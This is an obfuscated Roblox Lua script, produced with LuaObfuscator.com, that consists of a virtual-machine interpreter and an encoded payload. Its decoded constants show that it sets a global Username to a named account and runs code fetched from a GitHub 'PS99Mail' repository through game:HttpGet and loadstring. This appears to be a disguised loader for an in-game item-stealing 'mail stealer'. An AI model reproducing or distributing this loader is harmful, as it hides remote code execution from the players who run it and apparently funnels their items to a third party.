--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/(2^(v32-(2 -1))))%(2^(((v33-((879 -(282 + 595)) -1)) -(v32-(1 -(1637 -(1523 + 114))))) + (2 -1))) ;return v83-(v83%1) ;else local v84=619 -(555 + 58 + 6) ;local v85;while true do if (v84==(931 -(857 + 74))) then v85=(570 -(367 + 201))^(v32-(928 -((304 -90) + 713))) ;return (((v31%(v85 + v85))>=v85) and (1 + (1065 -(68 + 997)))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0;local v35;local v36;local v37;local v38;while true do if (v34==(1270 -(226 + 1044))) then v35,v36,v37,v38=v1(v16,v19,v19 + ((21 -9) -9) );v19=v19 + 4 ;v34=(216 -98) -(32 + 85) ;end if (v34==(1 + 0)) then return (v38 * (3720433 + 13056783)) + (v37 * (66493 -(892 + 65))) + (v36 * ((960 -(87 + 263)) -(534 -(67 + 113)))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;while true do local v66=0 + 0 ;while true do if (v66==1) then if (v39==(4 -2)) then local v95=0;while true do if (v95~=(3 -2)) then else for v105=1,v24() do local v106=0;local v107;local v108;local v109;while true do if (v106==(1048 -(67 + 980))) then v109=nil;while true do if (v107~=(1474 -(1329 + 145))) then else local v175=971 -(140 + 831) ;while true do if (v175==0) then v108=0;v109=nil;v175=1;end if (v175==(1851 -(1409 + 441))) then v107=719 -(15 + 703) ;break;end end end if (v107~=(1 + 0)) then else while true do if (v108~=0) then else v109=v22();if (v21(v109,1,1)==0) then local v180=438 -(262 + 176) ;local v181;local v182;local v183;local v184;while true do if ((1722 -(345 + 1376))~=v180) then else local v185=0;while true do if (v185~=(688 -(198 + 490))) then else v183=nil;v184=nil;v185=4 -3 ;end if (v185==(2 -1)) then v180=1208 -(696 + 510) ;break;end end end if (v180==0) then local v186=0;while true do if (v186~=(0 -0)) then else v181=1262 -(1091 + 171) ;v182=nil;v186=1;end if (v186==(1 + 0)) then v180=3 -2 ;break;end end end if (v180~=(6 -4)) then else while true do if ((375 -(123 + 251))~=v181) then else local v187=0;local v188;while true do if (v187==(0 -0)) then v188=0;while true do if (v188==(699 -(208 + 490))) then v181=1 + 1 ;break;end if (v188~=0) then else local v198=0 + 0 ;while true do if (v198~=(837 -(660 + 176))) then else v188=1;break;end if (v198~=(0 + 0)) then else v184={v23(),v23(),nil,nil};if (v182==(675 -(534 + 141))) then local v199=0;local v200;local v201;while true do if (v199~=(0 + 0)) then else v200=0 + 0 ;v201=nil;v199=1 + 0 ;end if (v199==1) then while true do if ((0 -0)==v200) then v201=0 -0 ;while true do if (v201~=0) then else v184[3]=v23();v184[4]=v23();break;end end break;end end break;end end elseif (v182==1) then v184[8 -5 ]=v24();elseif (v182==(2 + 0)) then v184[3]=v24() -(2^16) ;elseif (v182~=3) then else local v204=0;local v205;while true do if (v204~=0) then else v205=0 + 0 ;while true do if (v205==0) then v184[3]=v24() -((398 -(115 + 281))^16) ;v184[4]=v23();break;end end break;end end end v198=2 -1 ;end end end end break;end end end if (v181==(3 + 0)) then if (v21(v183,7 -4 ,10 -7 )==(868 -(550 + 317))) then v184[4]=v45[v184[4]];end v40[v105]=v184;break;end if (v181==(0 -0)) then local v190=0 -0 ;while true do if (v190==(0 -0)) then v182=v21(v109,2,288 -(134 + 151) );v183=v21(v109,4,6);v190=1666 -(970 + 695) ;end if (v190==(1 -0)) then v181=1;break;end end end if ((1992 -(582 + 1408))~=v181) then else local v191=0;while true do if (v191~=1) then else v181=10 -7 ;break;end if (0==v191) then if (v21(v183,1,1 -0 )==(3 -2)) then v184[1826 -(1195 + 629) ]=v45[v184[2]];end if (v21(v183,2 -0 ,2)~=(242 -(187 + 54))) then else v184[3]=v45[v184[783 -(162 + 618) ]];end v191=1;end end end end break;end end end break;end end break;end end break;end if (v106==(0 + 0)) then v107=0 + 0 ;v108=nil;v106=1;end end end v39=3;break;end if (v95~=(0 -0)) then else for v110=1 -0 ,v44 do local v111=0 + 0 ;local v112;local v113;while true do if (v111==(1636 -(1373 + 263))) then local v153=1000 -(451 + 549) ;while true do if (v153~=(0 + 0)) then else v112=v22();v113=nil;v153=1;end if (1~=v153) then else v111=1 -0 ;break;end end end if (v111==(1 -0)) then if (v112==(1385 -(746 + 638))) then v113=v22()~=(0 + 0) ;elseif (v112==(2 -0)) then v113=v25();elseif (v112==(344 -(218 + 123))) then v113=v26();end v45[v110]=v113;break;end end end v43[1584 -(1535 + 46) ]=v22();v95=1 + 0 ;end end end if (v39~=(1 + 2)) then else local v96=0;local v97;while true do if (v96~=0) then else v97=560 -(306 + 254) ;while true do if (v97~=(0 + 0)) then else local v132=0 -0 ;while true do if (v132~=0) then else for v176=1468 -(899 + 568) ,v24() do v41[v176-(1 + 0) ]=v29();end return v43;end end end end break;end end end break;end if (v66~=0) then else if (v39~=1) then else local v98=0 -0 ;local v99;while true do if (v98==0) then v99=603 -(268 + 335) ;while true do if (v99~=(290 -(60 + 230))) then else local v133=0;while true do if (0==v133) then v43={v40,v41,nil,v42};v44=v24();v133=1;end if (v133==1) then v99=1;break;end end end if (v99~=(2 -1)) then else v45={};v39=1 + 1 ;break;end end break;end end end if (v39~=(1024 -(706 + 318))) then else local v100=1251 -(721 + 530) ;local v101;while true do if (v100==0) then v101=1271 -(945 + 326) ;while true do if (v101~=0) then else v40={};v41={};v101=2 -1 ;end if (v101==1) then v42={};v39=1 + 0 ;break;end end break;end end end v66=701 -(271 + 429) ;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=1 + 0 ;local v49=(v21(v47,1501 -((4077 -2669) + 92) ,1106 -(461 + 625) ) * (((1456 -(122 + 44)) -(993 + 295))^(2 + (51 -21)))) + v46 ;local v50=v21(v47,1192 -((1386 -968) + 753) ,8 + 23 );local v51=((v21(v47,32)==(1 + 0)) and  -(1 + 0 + 0)) or (1 + 0) ;if (v50==0) then if (v49==(0 + 0 + 0)) then return v51 * (529 -(406 + 123)) ;else v50=(3585 -1815) -(1749 + 20) ;v48=0 + 0 ;end elseif (v50==(3369 -((1314 -(30 + 35)) + 73))) then return ((v49==0) and (v51 * (1/(0 + 0)))) or (v51 * NaN) ;end return v8(v51,v50-(365 + 658) ) * (v48 + (v49/((3 -1)^(1197 -(466 + 679))))) ;end v26=nil;function v26(v52)local v53;if  not v52 then v52=v24();if (v52==(1257 -(1043 + 214))) then return "";end end v53=v3(v16,v19,(v19 + v52) -(3 -2) );v19=v19 + v52 ;local v54={};for v67=1213 -(323 + 889) , #v53 do v54[v67]=v2(v1(v3(v53,v67,v67)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=(413 -(15 + 398)) -0 ;local v56;while true do if (v55==(581 -((1343 -(18 + 964)) + 219))) then return v56;end if (((1204 -884) -(53 + 267))==v55) then v56=v1(v16,v19,v19);v19=v19 + 1 + 0 + 0 ;v55=1;end end end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 2 ;return (v58 * (1106 -(20 + 830))) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v59,16));if v20 then local v102=0;local v103;while true do if (v102==1) then return v103;end if (v102==0) then v103=v5(v87,v20);v20=nil;v102=1;end end else return v87;end break;end end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v69=v63;local v70=v64;local v71=v65;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82==0) then v79[v81[2]]();elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=2) then v73=v81[3];elseif (v82==3) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v62;else v79[v81[2]]=v62[v81[3]];end else local v135=0;local v136;while true do if (v135==0) then v136=v81[2];v79[v136]=v79[v136](v13(v79,v136 + 1 ,v74));break;end end end elseif (v82<=7) then if (v82<=5) then v79[v81[2]]();elseif (v82==6) then do return;end else for v155=v81[2],v81[3] do v79[v155]=nil;end end elseif (v82<=8) then local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==2) then for v161=v116,v74 do local v162=0;while true do if (v162==0) then v119=v119 + 1 ;v79[v161]=v117[v119];break;end end end break;end if (v115==0) then v116=v81[2];v117,v118=v72(v79[v116](v13(v79,v116 + 1 ,v81[3])));v115=1;end if (v115==1) then v74=(v118 + v116) -1 ;v119=0;v115=2;end end elseif (v82>9) then v62[v81[3]]=v79[v81[2]];else local v139=v81[2];v79[v139]=v79[v139](v13(v79,v139 + 1 ,v74));end elseif (v82<=15) then if (v82<=12) then if (v82==11) then local v120=v81[2];local v121,v122=v72(v79[v120](v13(v79,v120 + 1 ,v81[3])));v74=(v122 + v120) -1 ;local v123=0;for v128=v120,v74 do local v129=0;while true do if (v129==0) then v123=v123 + 1 ;v79[v128]=v121[v123];break;end end end else v79[v81[2]]=v81[3];end elseif (v82<=13) then for v130=v81[2],v81[3] do v79[v130]=nil;end elseif (v82>14) then do return;end else v73=v81[3];end elseif (v82<=18) then if (v82<=16) then v62[v81[3]]=v79[v81[2]];elseif (v82==17) then local v142=0;local v143;local v144;while true do if (v142==0) then v143=v81[2];v144=v79[v81[3]];v142=1;end if (v142==1) then v79[v143 + 1 ]=v144;v79[v143]=v144[v81[4]];break;end end elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v62;else v79[v81[2]]=v62[v81[3]];end elseif (v82<=19) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82==20) then v79[v81[2]]=v81[3];else local v148=v81[2];local v149=v79[v81[3]];v79[v148 + 1 ]=v149;v79[v148]=v149[v81[4]];end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365726E616D65030D3O004D6178596F7475626547414D45030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O00120C3O00014O000D000100013O0026133O00020001000100040E3O0002000100120C000100013O002613000100050001000100040E3O0005000100120C000200033O001210000200023O002O12000200043O002O12000300053O00201100030003000600120C000500074O0008000300054O000900023O00024O00020001000100040E3O0014000100040E3O0005000100040E3O0014000100040E3O000200012O000F3O00017O00",v9(),...);
